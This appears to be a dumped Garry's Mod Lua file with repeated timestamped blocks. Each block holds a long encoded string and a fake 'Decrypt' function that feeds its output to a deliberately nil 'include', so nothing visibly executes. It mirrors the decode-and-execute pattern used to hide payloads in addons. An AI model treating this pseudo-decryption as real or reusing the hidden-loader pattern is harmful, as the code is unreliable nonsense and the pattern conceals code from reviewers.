		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
EPC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjcAAAAAAAAAAAtAQAAAQXAke7QHT2
/YfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjYAAAAAAAAAAAvAQAAAQXAAi2clXl
TvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4YAAAAAAAAAAAvAQAAAQXgCiUdoH5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjYAAAAAAAAAAAvAQAAAQXgCE9y2H5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjYAAAAAAAAAAAvAQAAAQXliqecsEE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjYAAAAAAAAAAAvAQAAAQXlies85EE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjYAAAAAAAAAAAvAQAAAQXliYjoGFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjYAAAAAAAAAAAvAQAAAQXliKyIUFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjYAAAAAAAAAAAvAQAAAQXq/MwbWgu
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjYAAAAAAAAAAAvAQAAAQXq/2JKjgu
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjYAAAAAAAAAAAvAQAAAQXAke7QPBD
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDZAAAAAAAAAAAvAQAAAQXhjdM5qQP
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDZAAAAAAAAAAAvAQAAAQXAAiWjnzz
TvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzLYZAAAAAAAAAAAvAQAAAQXgCE9qZf6
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMDZAAAAAAAAAAAvAQAAAQXliqeIkZF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQDZAAAAAAAAAAAvAQAAAQXliesoxZF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUDZAAAAAAAAAAAvAQAAAQXliYjU+ZF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYDZAAAAAAAAAAAvAQAAAQXliKy0LaF
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcDZAAAAAAAAAAAvAQAAAQXq/MwXryv
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgDZAAAAAAAAAAAvAQAAAQXq/2JG4yv
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkDZAAAAAAAAAAAvAQAAAQXAke7QXvP
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjZAAAAAAAAAAAvAQAAAQXhjdMR9qQ
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEjZAAAAAAAAAAAvAQAAAQXgCiUNu27
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjZAAAAAAAAAAAvAQAAAQXAAi2ppPC
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4ZAAAAAAAAAAAvAQAAAQXliqe0buG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjZAAAAAAAAAAAvAQAAAQXliesUpuG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjZAAAAAAAAAAAvAQAAAQXliYjA2uG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjZAAAAAAAAAAAvAQAAAQXliKygDvG
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjZAAAAAAAAAAAvAQAAAQXqMq+WAFx
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjZAAAAAAAAAAAvAQAAAQXqMKdFNFx
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjZAAAAAAAAAAAvAQAAAQXAke7Qfdc
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDaAAAAAAAAAAAvAQAAAQXhjdMpPFS
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDaAAAAAAAAAAAvAQAAAQXgCiUFRO9
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIDaAAAAAAAAAAAvAQAAAQXgCE9afO9
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMDaAAAAAAAAAAAvAQAAAQXAAiWwrrQ
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzLYaAAAAAAAAAAAvAQAAAQXliesAhDI
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUDaAAAAAAAAAAAvAQAAAQXliYjstDI
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYDaAAAAAAAAAAAvAQAAAQXliKyM7DI
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcDaAAAAAAAAAAAvAQAAAQXq/MwTVXy
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgDaAAAAAAAAAAAvAQAAAQXq/2JCiXy
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkDaAAAAAAAAAAAvAQAAAQXAke7QnLp
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjaAAAAAAAAAAAvAQAAAQXhjdM9hfT
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEjaAAAAAAAAAAAvAQAAAQXgCiU9zl+
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjaAAAAAAAAAAAvAQAAAQXgCE9SCm+
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjaAAAAAAAAAAAvAQAAAQXliqeILYJ
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjaAAAAAAAAAAAvAQAAAQXAAi22tHf
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4aAAAAAAAAAAAvAQAAAQXliYjUlYJ
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjaAAAAAAAAAAAvAQAAAQXliKy0yYJ
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcjaAAAAAAAAAAAvAQAAAQXq/MwPqpz
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjaAAAAAAAAAAAvAQAAAQXq/2J+2pz
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjaAAAAAAAAAAAvAQAAAQXAke7Qv51
AZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDbAAAAAAAAAAAvAQAAAQXhjdMV05U
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDbAAAAAAAAAAAvAQAAAQXgCiU1W9/
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIDbAAAAAAAAAAAvAQAAAQXgCE9Kl9/
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMDbAAAAAAAAAAAvAQAAAQXliqe0CtK
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQDbAAAAAAAAAAAvAQAAAQXliesUQtK
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUDbAAAAAAAAAAAvAQAAAQXAAiW9vjt
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzLYbAAAAAAAAAAAvAQAAAQXliKygqtK
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJcDbAAAAAAAAAAAvAQAAAQXq/MwL/70
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgDbAAAAAAAAAAAvAQAAAQXq/2J6L80
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkDbAAAAAAAAAAAvAQAAAQXAke7Q3nC
BZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjbAAAAAAAAAAAvAQAAAQXhjdMtGUW
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEjbAAAAAAAAAAAvAQAAAQXgCiUt5UB
W9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjbAAAAAAAAAAAvAQAAAQXgCE9CIVB
W9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjbAAAAAAAAAAAvAQAAAQXliqeg6BM
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjbAAAAAAAAAAAvAQAAAQXliesAICM
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjbAAAAAAAAAAAvAQAAAQXliYjsUCM
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjbAAAAAAAAAAAvAQAAAQXAAi2Dy/7
UvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4bAAAAAAAAAAAvAQAAAQXqMq+KUO2
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJgjbAAAAAAAAAAAvAQAAAQXqMKd5gO2
vYr8IElEIfI7Xz3gsE93zJTQUukuINS0+ghJX4Y65RxkMXI5GJkjbAAAAAAAAAAAvAQAAAQXAke7Q/VP
BZfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCDcAAAAAAAAAAAvAQAAAQXhjdMFZuX
sAbiTFYfnGXtlg4Ue6J4ZtncdfJHcPSm6HYsXMonnOVoYfXqHJEDcAAAAAAAAAAAvAQAAAQXgCiUlcsC
W9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIDcAAAAAAAAAAAvAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:30          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
EPC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjcAAAAAAAAAAAtAQAAAQXAke7QHT2
/YfMAfbJ+c3xPsfIJLGVNt1aCEgx/AJAcUd1fO4nkPO9HETdYzCjYAAAAAAAAAAAvAQAAAQXAAi2clXl
TvbnscGh2bdjv8ZkNnWzK2XqqL3WuRurDWGZYFBmz5ZFA+SdYzL4YAAAAAAAAAAAvAQAAAQXgCiUdoH5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJIjYAAAAAAAAAAAvAQAAAQXgCE9y2H5
V9IlIWGLxIst9DMAvop8VOemLlFO5p6Owx8IYphsLisAxccZHJMjYAAAAAAAAAAAvAQAAAQXliqecsEE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJQjYAAAAAAAAAAAvAQAAAQXlies85EE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJUjYAAAAAAAAAAAvAQAAAQXliYjoGFE
Ku8pl5YNgT9q8xMVdxAb3MkuoUGoHXfCS+tqSkdjvlhFLjCJHJYjYAAAAAAAAAAAvAQAAAQXliKyIUFE
